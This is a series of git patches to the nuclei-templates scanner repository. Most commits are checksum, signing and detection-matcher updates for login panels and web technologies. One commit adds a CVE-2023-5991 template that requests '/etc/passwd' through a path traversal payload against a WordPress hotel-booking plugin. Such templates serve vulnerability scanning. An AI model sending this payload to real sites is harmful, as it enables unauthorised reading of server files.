http/exposed-panels/nagvis-panel.yaml:ba54ad10ecee829efd444c6c975cac871ddd03ad @@ -6749,7 +6749,7 @@ http/technologies/icecast-mediaserver-detect.yaml:e8cd04701c56d72863370946d98a0a http/technologies/icecast-server-detect.yaml:9c420fa5e33996ea06f25259e6d07fbc940e416d http/technologies/identity-server-v3-detect.yaml:1d81d62bf57fbefb494e082d68cb7e5568382f02 http/technologies/ilo-detect.yaml:71e46841d352f772fe4ef93feed925411dd00ad0 -http/technologies/imgproxy-detect.yaml:b26f7167174072110d8a505954a547a394e18569 +http/technologies/imgproxy-detect.yaml:a5819e528c4e6c397c971fe78e49fb76ba0e6820 http/technologies/impresscms-detect.yaml:aed6cbf7a0e39d65461ad18a94870d5498a81ee5 http/technologies/influxdb-version-detect.yaml:f841eecc70b68b122327d0af759d612c344c18c9 http/technologies/interactsh-server.yaml:7b66780d07fddd75e7a107ff31dd20d43a2f1bfe @@ -8524,7 +8524,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:8ba4dfb0611690abdfca9989ff1f95c2d909e742 +templates-checksum.txt:6862472e7fcdfc3c1e6dd93385379527dad55a95 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 5aab7bcbd85a5520cc96ee9ffd1089039db3cdf2 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 14 May 2024 08:40:42 +0000 Subject: [PATCH 0970/1768] Auto Template Signing [Tue May 14 08:40:42 UTC 2024] :robot: --- http/exposed-panels/ghost-panel.yaml | 1 + http/exposed-panels/jfrog-login.yaml | 1 + http/exposed-panels/pocketbase-panel.yaml | 1 + 3 files changed, 3 insertions(+) diff --git a/http/exposed-panels/ghost-panel.yaml b/http/exposed-panels/ghost-panel.yaml index 25714ff071..16405a4dfa 100644 --- a/http/exposed-panels/ghost-panel.yaml +++ b/http/exposed-panels/ghost-panel.yaml @@ -28,3 +28,4 @@ http: - 'content="Ghost"' condition: or case-insensitive: true +# digest: 490a0046304402202af11dfd43edc17a45dfc121349d833dbd78ff0697151d343819bb4d92d017ad02203d27811c2b3637bcec56100b871612a3681146bc78ceed7655293382f683ef14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/jfrog-login.yaml b/http/exposed-panels/jfrog-login.yaml index 437f62cf28..73afbece5f 100644 --- a/http/exposed-panels/jfrog-login.yaml +++ b/http/exposed-panels/jfrog-login.yaml @@ -30,3 +30,4 @@ http: - 'status_code==200 && contains(body, "<title>JFrog")' - "status_code==200 && (\"-595620639\" == mmh3(base64_py(body)))" condition: or +# digest: 4a0a004730450221009cfe5c81bde3f5c9462974f80c97205e62b24f03aab1a1893ca852fc0b0b49a802201c6f8e2531a0dc3974eb9f8b284db5527b43eaa7041e2eddbe10753137f5931f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/pocketbase-panel.yaml b/http/exposed-panels/pocketbase-panel.yaml index 221c4349db..83b7338994 100644 --- a/http/exposed-panels/pocketbase-panel.yaml +++ b/http/exposed-panels/pocketbase-panel.yaml @@ -31,3 +31,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100f1f276ce2fb2420838d2f811e2b64dc4f881f87e145e1f5eaf9a6c5526bdc1fe022100c06c702de4ff917e3a3dc700b377ff3054243af2c89c6e2bcd36c447560b85e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 07a8a636e91d8f807740fdb1bcba2f781e73a69c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 14 May 2024 14:12:25 +0530 Subject: [PATCH 0971/1768] updated matchers --- http/exposed-panels/umami-panel.yaml | 13 +++---------- 1 file changed, 3 insertions(+), 10 deletions(-) diff --git a/http/exposed-panels/umami-panel.yaml b/http/exposed-panels/umami-panel.yaml index a7426f180e..d21f41ac23 100644 --- a/http/exposed-panels/umami-panel.yaml +++ b/http/exposed-panels/umami-panel.yaml @@ -11,7 +11,7 @@ info: - https://umami.is/docs metadata: verified: true - max-request: 1 + max-request: 3 shodan-query: http.favicon.hash:-130447705 tags: panel,umami,login,detect @@ -24,19 +24,12 @@ http: - "{{BaseURL}}/favicon.ico" stop-at-first-match: true - matchers-condition: or matchers: - - type: word - part: body - words: - - 'Login | umami' - - 'umami</div>' - condition: or - case-insensitive: true - - type: dsl dsl: + - 'status_code==200 && contains_any(tolower(body), "Login | umami", "umami</div>", "umami</h1>", "<title>umami - login")' - "status_code==200 && (\"-130447705\" == mmh3(base64_py(body)))" + condition: or - method: GET path: From 6994291df2203676109cec0b6196f7f52480987b Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 14 May 2024 08:49:48 +0000 Subject: [PATCH 0973/1768] Auto Generated Templates Checksum [Tue May 14 08:49:48 UTC 2024] :robot: --- templates-checksum.txt | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 3189f9ca22..28cb230b03 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3840,7 +3840,7 @@ http/exposed-panels/genweb-plus-panel.yaml:722cb54cc9efc1b84972c6d80c994282efb8f http/exposed-panels/geoserver-login-panel.yaml:c62e462b728c52ae197f5b0446ae908f3401a935 http/exposed-panels/gerapy-detect.yaml:724d1afda108c6a2912bcc793046063e26909b86 http/exposed-panels/gespage-panel.yaml:57eee82ad1606862ed17208b8ff03a7cdba0cb16 -http/exposed-panels/ghost-panel.yaml:de0612cb4c27c9c6fc25fc78e71a5f7ece5dc141 +http/exposed-panels/ghost-panel.yaml:b756b79a07012086b84e1b3b5e946128e34f85f5 http/exposed-panels/gira-homeserver-homepage.yaml:c88f54ceb96676698f89520661b9594f644d6fc2 http/exposed-panels/git-repository-browser.yaml:5b9b836099213deb45e0d441e5cb66224cf5c8a5 http/exposed-panels/gitblit-panel.yaml:8b14a008bde650f9f125c4b930c2908aa6b95334 @@ -3954,7 +3954,7 @@ http/exposed-panels/jeedom-panel.yaml:3fb84bbcfa09ce6964cb2dce502f417498bf82b4 http/exposed-panels/jellyseerr-login-panel.yaml:51a7c1b5d8b5e3f8169bbc8abd9941821477fc41 http/exposed-panels/jenkins-api-panel.yaml:0ba41d9daabab4714bcf58808cfc661c9e9310f2 http/exposed-panels/jenkins-login.yaml:89b0f8e296398a825248bd82947ca61fce3c2a7c -http/exposed-panels/jfrog-login.yaml:c9a40806e3a7ffa48d47ce407b6efa9a563faf56 +http/exposed-panels/jfrog-login.yaml:11757e8cca9629ff2a9ab002a2dedcf867f7692b http/exposed-panels/joget/joget-panel.yaml:a7dfc3fd4921ef9b756bc772a6ce004594f1c29f http/exposed-panels/joomla-panel.yaml:c3ea62950f42c467e19f7a5e7760cd69dfd28bd3 http/exposed-panels/jorani-panel.yaml:7dc1efc38bc8c6be36cec66f40d930500c085baf @@ -4210,7 +4210,7 @@ http/exposed-panels/plastic-scm-login.yaml:fe6d092c51727b09cb9451654271bd3e5e674 http/exposed-panels/plausible-panel.yaml:618d3a4a135c8e80ca35582a0620bcb2d300c63f http/exposed-panels/plesk-obsidian-login.yaml:7f424a234fc5e054a1186ed9fdf7fa84780e66a6 http/exposed-panels/plesk-onyx-login.yaml:f423044e8413a51421c210b0f4f49445efb4606c -http/exposed-panels/pocketbase-panel.yaml:25abff181c32afb59827557e42ba90e44daf471b +http/exposed-panels/pocketbase-panel.yaml:fb5f9369e3ec6a95be6cf0dec0f2fc70639e8176 http/exposed-panels/polycom-admin-detect.yaml:09ff65e682061de9f992c4c4539615e0a62fdc4c http/exposed-panels/polycom-login.yaml:9dfb75c477c1d850cb3c4e767e5f1027c65c7e01 http/exposed-panels/portainer-panel.yaml:e3b502c10ccb719774f551f98c8676d5b60c0403 @@ -4451,7 +4451,7 @@ http/exposed-panels/turnkey-openvpn.yaml:39c452eb93078b6a3c5c3b7f7789fba65fb9dbf http/exposed-panels/tuxedo-connected-controller.yaml:ee4f09412b94ae739070bf2b62882f835d9f0767 http/exposed-panels/typo3-login.yaml:72cfd4ea09b641aada781d8217ae54a23b88a0cd http/exposed-panels/uipath-orchestrator-panel.yaml:af4705f7f98e419ceddff8130581d58ce6028339 -http/exposed-panels/umami-panel.yaml:325957c13e47f3abedc47f8001c40b08d5626486 +http/exposed-panels/umami-panel.yaml:abbff75cd5e6eeea2639f30d43b63c15a8744e0d http/exposed-panels/umbraco-login.yaml:fdfd46a20aa2721ffa8784101d3b1b69f2393ea7 http/exposed-panels/unauth/tautulli-unauth.yaml:091217f1b5773c345e63401e05aa540485af4672 http/exposed-panels/unauth-xproxy-dashboard.yaml:c01ec537b431a19a6379b6616d1656cb6081b84a @@ -8524,7 +8524,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:6862472e7fcdfc3c1e6dd93385379527dad55a95 +templates-checksum.txt:df9bdb0857ee15b509156fc0299c135a3575e6c1 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From eab4c958d0e0e095e57e6f8006ee5a609c5d11ac Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 14 May 2024 08:51:36 +0000 Subject: [PATCH 0974/1768] Auto Template Signing [Tue May 14 08:51:36 UTC 2024] :robot: --- http/exposed-panels/umami-panel.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposed-panels/umami-panel.yaml b/http/exposed-panels/umami-panel.yaml index d21f41ac23..9317446dd8 100644 --- a/http/exposed-panels/umami-panel.yaml +++ b/http/exposed-panels/umami-panel.yaml @@ -40,3 +40,4 @@ http: part: body regex: - 'v(?P<version>\d+\.\d+\.\d+)' +# digest: 490a00463044022057cb7369c95c71f95c75ff52799af65aadbe03982e0a51870dc0b8912897932402201c21a65921c649934e56e808ee0076cc892841ec816ad72cbcb49549e3995a62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 9bc1142faa25de6244ae51f00ae173869555460f Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 14 May 2024 14:23:37 +0530 Subject: [PATCH 0975/1768] Update softether-vpn-default-login.yaml --- .../default-logins/softether/softether-vpn-default-login.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/default-logins/softether/softether-vpn-default-login.yaml b/http/default-logins/softether/softether-vpn-default-login.yaml index d40d1f073d..269d701ef4 100644 --- a/http/default-logins/softether/softether-vpn-default-login.yaml +++ b/http/default-logins/softether/softether-vpn-default-login.yaml @@ -9,10 +9,10 @@ info: reference: - https://www.softether.org/4-docs/1-manual/3._SoftEther_VPN_Server_Manual/3.3_VPN_Server_Administration#Administration_Authority_for_the_Entire_SoftEther_VPN_Server metadata: - shodan-query: title:"SoftEther VPN Server" verified: true max-request: 1 - tags: panel,vpn,softether,default-login + shodan-query: title:"SoftEther VPN Server" + tags: misconfig,vpn,softether,default-login http: - raw: From 0b215762bff48a505b9922c56a8f63ff9598a6a8 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 14 May 2024 09:00:08 +0000 Subject: [PATCH 0976/1768] Auto Generated New Template Addition List [Tue May 14 09:00:08 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 4b8d4ddbaa..fc4f5ccf95 100644 --- a/.new-additions +++ b/.new-additions @@ -3,6 +3,7 @@ http/cves/2023/CVE-2023-36347.yaml http/cves/2023/CVE-2023-43374.yaml http/cves/2023/CVE-2023-45855.yaml http/cves/2024/CVE-2024-0200.yaml +http/default-logins/softether/softether-vpn-default-login.yaml http/exposed-panels/ackee-panel.yaml http/exposed-panels/craftercms-panel.yaml http/exposed-panels/easyvista-panel.yaml From 9c026ef366000ab43e1069724a9302324d05dc6d Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 14 May 2024 09:00:17 +0000 Subject: [PATCH 0977/1768] Auto Generated Templates Checksum [Tue May 14 09:00:17 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 28cb230b03..c997b91d4e 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3444,6 +3444,7 @@ http/default-logins/seeyon/seeyon-monitor-default-login.yaml:f4a51f27c4e839502e7 http/default-logins/sequoiadb/sequoiadb-default-login.yaml:dabe65c9eef1e73cc13c91f81ef91b44503583c4 http/default-logins/showdoc/showdoc-default-login.yaml:a3fadb617e0f5eab493196fc3422db16dfab647a http/default-logins/smartbi/smartbi-default-login.yaml:62ea338413d060ca9e21ffdacbcd946cd0cfc8a2 +http/default-logins/softether/softether-vpn-default-login.yaml:8d8bbab4f5ccde8a9f50536a71030cb17ac49d89 http/default-logins/solarwinds/solarwinds-default-login.yaml:37255b4d25b1aed06374df59af8da5a1ff8993cd http/default-logins/sonarqube/sonarqube-default-login.yaml:46757166900a43af2c1587461e43a72a6aabc1b5 http/default-logins/soplanning/soplanning-default-login.yaml:3c498e1990912358f380b450f3d4f18fdfa0ebb1 @@ -4451,7 +4452,7 @@ http/exposed-panels/turnkey-openvpn.yaml:39c452eb93078b6a3c5c3b7f7789fba65fb9dbf http/exposed-panels/tuxedo-connected-controller.yaml:ee4f09412b94ae739070bf2b62882f835d9f0767 http/exposed-panels/typo3-login.yaml:72cfd4ea09b641aada781d8217ae54a23b88a0cd http/exposed-panels/uipath-orchestrator-panel.yaml:af4705f7f98e419ceddff8130581d58ce6028339 -http/exposed-panels/umami-panel.yaml:abbff75cd5e6eeea2639f30d43b63c15a8744e0d +http/exposed-panels/umami-panel.yaml:f6551441a99dfa7eae097d14e7adc8122ce8cb8d http/exposed-panels/umbraco-login.yaml:fdfd46a20aa2721ffa8784101d3b1b69f2393ea7 http/exposed-panels/unauth/tautulli-unauth.yaml:091217f1b5773c345e63401e05aa540485af4672 http/exposed-panels/unauth-xproxy-dashboard.yaml:c01ec537b431a19a6379b6616d1656cb6081b84a @@ -8524,7 +8525,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:df9bdb0857ee15b509156fc0299c135a3575e6c1 +templates-checksum.txt:6cb64eac5b580ac207d5ea00b16ab0ae45dfe7ed wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From f7b48eb444ed206c2f492c7add5999841bb024a8 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Tue, 14 May 2024 09:00:47 +0000 Subject: [PATCH 0978/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 20013269d7..b5b40de222 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -8,6 +8,7 @@ on: - 'http/cves/2023/CVE-2023-43374.yaml' - 'http/cves/2023/CVE-2023-45855.yaml' - 'http/cves/2024/CVE-2024-0200.yaml' + - 'http/default-logins/softether/softether-vpn-default-login.yaml' - 'http/exposed-panels/ackee-panel.yaml' - 'http/exposed-panels/craftercms-panel.yaml' - 'http/exposed-panels/easyvista-panel.yaml' From e33550b6de3cef0806f3dc7d3caa3e3112485620 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 14 May 2024 09:01:57 +0000 Subject: [PATCH 0979/1768] Auto Template Signing [Tue May 14 09:01:57 UTC 2024] :robot: --- http/default-logins/softether/softether-vpn-default-login.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/default-logins/softether/softether-vpn-default-login.yaml b/http/default-logins/softether/softether-vpn-default-login.yaml index 269d701ef4..42fde94b7c 100644 --- a/http/default-logins/softether/softether-vpn-default-login.yaml +++ b/http/default-logins/softether/softether-vpn-default-login.yaml @@ -40,3 +40,4 @@ http: - type: status status: - 200 +# digest: 490a0046304402205c1ef0dce69c50da55acaa53406c82710813d759723176e6ef4e4fee858b7bca02200b895a7367f4e624433a856e0dbf9d38de950d2d115ca5c5527c82ad81ba5394:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From fc27ea4695bc0b81ea51fad3e6a627573600d2d4 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 14 May 2024 14:53:41 +0530 Subject: [PATCH 0980/1768] added content type --- http/misconfiguration/imgproxy-unauth.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/misconfiguration/imgproxy-unauth.yaml b/http/misconfiguration/imgproxy-unauth.yaml index 6975366998..c2f8e5d113 100644 --- a/http/misconfiguration/imgproxy-unauth.yaml +++ b/http/misconfiguration/imgproxy-unauth.yaml @@ -30,5 +30,6 @@ http: - type: dsl dsl: - 'status_code==200' + - 'contains(content_type, "image/png")' - '("386116288" == mmh3(base64_py(body)))' - condition: and \ No newline at end of file + condition: and From cdf72ae99a99fb8f1ad517935e81ce02c7bf9c25 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 14 May 2024 15:03:54 +0530 Subject: [PATCH 0981/1768] Update and rename boa-webserver.yaml to boa-web-server.yaml --- .../boa-web-server.yaml} | 13 +++++++++---- 1 file changed, 9 insertions(+), 4 deletions(-) rename http/{exposed-panels/boa-webserver.yaml => technologies/boa-web-server.yaml} (62%) diff --git a/http/exposed-panels/boa-webserver.yaml b/http/technologies/boa-web-server.yaml similarity index 62% rename from http/exposed-panels/boa-webserver.yaml rename to http/technologies/boa-web-server.yaml index 814f0a8c45..ecde83d378 100644 --- a/http/exposed-panels/boa-webserver.yaml +++ b/http/technologies/boa-web-server.yaml @@ -1,16 +1,21 @@ -id: boa-webserver +id: boa-web-server info: - name: Boa Web Server- Detect + name: Boa Web Server - Detect author: johnk3r severity: info - description: Boa is a single-tasking HTTP server. That means that unlike traditional web servers, it does not fork for each incoming connection, nor does it fork many copies of itself to handle multiple connections. + description: | + Boa is a single-tasking HTTP server. That means that unlike traditional web servers, it does not fork for each incoming connection, nor does it fork many copies of itself to handle multiple connections. reference: - https://www.microsoft.com/en-us/security/blog/2022/11/22/vulnerable-sdk-components-lead-to-supply-chain-risks-in-iot-and-ot-environments/ - http://www.boa.org/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + metadata: + shodan-query: "Server: Boa/" + verified: true + max-request: 1 tags: boa,tech http: @@ -23,7 +28,7 @@ http: - type: regex part: header regex: - - "Boa/" + - "Server: Boa/" - type: status status: From 34f0e2623646f71a71435784ffa0203c3e122906 Mon Sep 17 00:00:00 2001 From: idealphase <mynameisphase@gmail.com> Date: Tue, 14 May 2024 16:53:46 +0700 Subject: [PATCH 0982/1768] Update cacti-panel.yaml Added shodan-query and fofa-query for primary Shodan and fofa user or nuclei option -uncover-engine --- http/exposed-panels/cacti-panel.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/cacti-panel.yaml b/http/exposed-panels/cacti-panel.yaml index c619f5efa4..5c2f80c2fc 100644 --- a/http/exposed-panels/cacti-panel.yaml +++ b/http/exposed-panels/cacti-panel.yaml @@ -2,7 +2,7 @@ id: cacti-panel info: name: Cacti Login Panel - Detect - author: geeknik,daffainfo + author: geeknik,daffainfo,idealphase severity: info description: Cacti login panel was detected. reference: @@ -15,6 +15,8 @@ info: max-request: 2 product: cacti vendor: cacti + shodan-query: http.favicon.hash:-1797138069 + fofa-query: icon_hash="-1797138069" tags: tech,cacti,login,panel http: @@ -49,4 +51,4 @@ http: group: 1 regex: - "<div class='versionInfo'>Version (.*) |" -# digest: 4a0a0047304502210091466c451eb83a632009e16596e016864e58809145127b30333708c9965f718a0220698ba9fb6b9818ed4c6441084c12df39731e4a6124c062b93ca178bc2abd5ea4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210091466c451eb83a632009e16596e016864e58809145127b30333708c9965f718a0220698ba9fb6b9818ed4c6441084c12df39731e4a6124c062b93ca178bc2abd5ea4:922c64590222798bb761d5b6d8e72950 From a03b376447358339cbe37cd06ee13b878dcbd474 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 14 May 2024 15:32:19 +0530 Subject: [PATCH 0983/1768] minor update --- http/exposed-panels/cacti-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposed-panels/cacti-panel.yaml b/http/exposed-panels/cacti-panel.yaml index 5c2f80c2fc..f15f6bb24b 100644 --- a/http/exposed-panels/cacti-panel.yaml +++ b/http/exposed-panels/cacti-panel.yaml @@ -2,7 +2,7 @@ id: cacti-panel info: name: Cacti Login Panel - Detect - author: geeknik,daffainfo,idealphase + author: geeknik,daffainfo severity: info description: Cacti login panel was detected. reference: From acc44135cb1ca0f6621b9b930c72b67565f237a8 Mon Sep 17 00:00:00 2001 From: Kazgangap <halilkirazkaya@yandex.com> Date: Tue, 14 May 2024 13:34:23 +0300 Subject: [PATCH 0984/1768] add cve 2023 5991 --- http/cves/2023/CVE-2023-5991.yaml | 39 +++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 http/cves/2023/CVE-2023-5991.yaml diff --git a/http/cves/2023/CVE-2023-5991.yaml b/http/cves/2023/CVE-2023-5991.yaml new file mode 100644 index 0000000000..4aa0a0d2eb --- /dev/null +++ b/http/cves/2023/CVE-2023-5991.yaml @@ -0,0 +1,39 @@ +id: CVE-2023-5991 + +info: + name: Hotel Booking Lite < 4.8.5 - Unauthenticated Arbitrary File Download & Deletion + author: Kazgangap + severity: critical + description: | + The Hotel Booking Lite WordPress plugin before 4.8.5 does not validate file paths provided via user input, as well as does not have proper CSRF and authorisation checks, allowing unauthenticated users to download and delete arbitrary files on the server + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-5991 + - https://wpscan.com/vulnerability/e9d35e36-1e60-4483-b8b3-5cbf08fcd49e/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-5991 + cwe-id: CWE-22 + epss-score: 0.00603 + epss-percentile: 0.78406 + cpe: cpe:2.3:a:motopress:hotel_booking_lite:*:*:*:*:*:wordpress:*:* + metadata: + vendor: motopress + product: hotel_booking_lite + framework: wordpress + tags: wpscan,pathtraversal,cve2023,wp-plugin + +http: + - method: GET + path: + - "{{BaseURL}}/?filename=../../../../../../etc/passwd&mphb_action=download" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 \ No newline at end of file From 0118f01e9696d99dbe7a14b63d784ffca3a804dc Mon Sep 17 00:00:00 2001 From: Mohammad D <mohammadamindehghani@pm.me> Date: Tue, 14 May 2024 14:12:19 +0330 Subject: [PATCH 0985/1768] Add n8n & umami favicon-detect.yaml --- http/technologies/favicon-detect.yaml | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/http/technologies/favicon-detect.yaml b/http/technologies/favicon-detect.yaml index e3d9398fd9..3e821e1d56 100644 --- a/http/technologies/favicon-detect.yaml +++ b/http/technologies/favicon-detect.yaml @@ -3741,6 +3741,16 @@ http: dsl: - "status_code==200 && (\"702863115\" == mmh3(base64_py(body)))" + - type: dsl + name: "n8n" + dsl: + - "status_code==200 && (\"-831756631\" == mmh3(base64_py(body)))" + + - type: dsl + name: "umami" + dsl: + - "status_code==200 && (\"-130447705\" == mmh3(base64_py(body)))" + extractors: - type: dsl dsl: From 4df9af89b452170e0dff49522c74b888b716454e Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 14 May 2024 16:24:36 +0530 Subject: [PATCH 0986/1768] lint fix --- http/cves/2023/CVE-2023-5991.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/http/cves/2023/CVE-2023-5991.yaml b/http/cves/2023/CVE-2023-5991.yaml index 4aa0a0d2eb..88a964407e 100644 --- a/http/cves/2023/CVE-2023-5991.yaml +++ b/http/cves/2023/CVE-2023-5991.yaml @@ -1,7 +1,7 @@ id: CVE-2023-5991 info: - name: Hotel Booking Lite < 4.8.5 - Unauthenticated Arbitrary File Download & Deletion + name: Hotel Booking Lite < 4.8.5 - Arbitrary File Download & Deletion author: Kazgangap severity: critical description: | @@ -21,12 +21,12 @@ info: vendor: motopress product: hotel_booking_lite framework: wordpress - tags: wpscan,pathtraversal,cve2023,wp-plugin + tags: cve,cve2023,lfi,hbl,hotel http: - method: GET - path: - - "{{BaseURL}}/?filename=../../../../../../etc/passwd&mphb_action=download" + path: + - "{{BaseURL}}/?filename=../../../../../../etc/passwd&mphb_action=download" matchers-condition: and matchers: @@ -36,4 +36,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 From 4e57e7ef6d1b363f2dcde588517dec43c11775e3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Tue, 14 May 2024 16:46:34 +0530 Subject: [PATCH 0987/1768] Create wordpress.yml --- profiles/wordpress.yml | 9 +++++++++ 1 file changed, 9 insertions(+) create mode 100644 profiles/wordpress.yml diff --git a/profiles/wordpress.yml b/profiles/wordpress.yml new file mode 100644 index 0000000000..393836cb68 --- /dev/null +++ b/profiles/wordpress.yml @@ -0,0 +1,9 @@ +# This is a configuration file for the wordpress template profile. +# Additional configuration profiles can be created for different types of nuclei scans. +# They should be placed under the 'profiles' directory at: +# https://github.com/projectdiscovery/nuclei-templates +# Here is an example of how to use a profiles profile: +# nuclei -config profiles/wordpress.yml -list target_list_to_scan.txt + +tags: + - wordpress From 29787657684e1b6b9fbd728d7b2d4e39c76f002e Mon Sep 17 00:00:00 2001 From: Mohammad D <mohammadamindehghani@pm.me> Date: Tue, 14 May 2024 14:52:09 +0330 Subject: [PATCH 0988/1768] Add tiny-rss-panel.yaml --- http/exposed-panels/tiny-rss-panel.yaml | 29 +++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 http/exposed-panels/tiny-rss-panel.yaml diff --git a/http/exposed-panels/tiny-rss-panel.yaml b/http/exposed-panels/tiny-rss-panel.yaml new file mode 100644 index 0000000000..de289c8bb0 --- /dev/null +++ b/http/exposed-panels/tiny-rss-panel.yaml @@ -0,0 +1,29 @@ +id: tiny-rss-panel + +info: + name: Tiny RSS Panel - Detect + author: userdehghani + severity: info + description: | + Tiny Tiny RSS is a free RSS feed reader + reference: + - https://tt-rss.org/ + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:-418614327 + tags: panel,tiny-rss,login,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: dsl + dsl: + - 'status_code==200 && contains(tolower(body), "Tiny Tiny RSS")' + - 'status_code==200 && contains(tolower(body), "ttrss_login")' + - 'status_code==200 && contains(tolower(body), "ttrss_utility")' + + From 6b3cdcc7cb9d6f8ccf5a0cf1faaf9a2c3cb89a03 Mon Sep 17 00:00:00 2001 From: Mohammad D <m.a.dehghani609@gmail.com> Date: Tue, 14 May 2024 14:57:42 +0330 Subject: [PATCH 0989/1768] Update tiny-rss-panel.yaml --- http/exposed-panels/tiny-rss-panel.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/exposed-panels/tiny-rss-panel.yaml b/http/exposed-panels/tiny-rss-panel.yaml index de289c8bb0..7d226d6904 100644 --- a/http/exposed-panels/tiny-rss-panel.yaml +++ b/http/exposed-panels/tiny-rss-panel.yaml @@ -25,5 +25,4 @@ http: - 'status_code==200 && contains(tolower(body), "Tiny Tiny RSS")' - 'status_code==200 && contains(tolower(body), "ttrss_login")' - 'status_code==200 && contains(tolower(body), "ttrss_utility")' - - + condition: and From 74afd0e22e6684a55e0a846936b2a266b81435b7 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 14 May 2024 12:21:34 +0000 Subject: [PATCH 0991/1768] Auto Generated Templates Checksum [Tue May 14 12:21:34 UTC 2024] :robot: --- 